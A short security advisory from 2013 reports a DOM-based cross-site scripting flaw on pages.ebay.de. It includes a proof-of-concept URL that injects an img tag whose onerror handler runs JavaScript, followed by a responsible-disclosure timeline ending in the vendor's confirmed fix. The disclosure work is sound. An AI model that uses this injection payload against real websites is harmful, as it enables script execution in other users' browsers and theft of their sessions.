Advisory:		pages.ebay.de - DOM based Cross-site Scripting vulnerability
Advisory ID:		SSCHADV2013-011
Author:			Stefan Schurtz
Affected Software:	Successfully tested on pages.ebay.de
Vendor URL:		http://www.ebay.com
Vendor Status:		fixed

==========================
Vulnerability Description
==========================

The website 'pages.ebay.de' is prone to a DOM based XSS vulnerability.

==========================
PoC-Exploit
==========================

// IE10 / SRWware Iron 24.0 / Google Chrome 27.0

http://pages.ebay.de/kaeuferschutz/fragen-antworten.html?tSection=1111#"><img src="aaa.jpg" onerror=javascript:alert(document.domain)>

==========================
Disclosure Timeline
==========================

19-Oct-2013 - vendor informed by contact form http://pages.ebay.com/securitycenter/researchers.html
21-Oct-2013 - feedback from eBay Security Research team
22-Oct-2013 - sending more infos about the XSS to the eBay Security Research Team
25-OCt-2013 - vendor asks for more technical information
26-Oct-2013 - technical details sent to eBay Security Research team
07-Nov-2013 - vulnerability seems to be fixed
11-Nov-2013 - eBay Security Research team confirms the fix

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.ebay.com
http://www.darksecurity.de/advisories/2013/SSCHADV2013-011.txt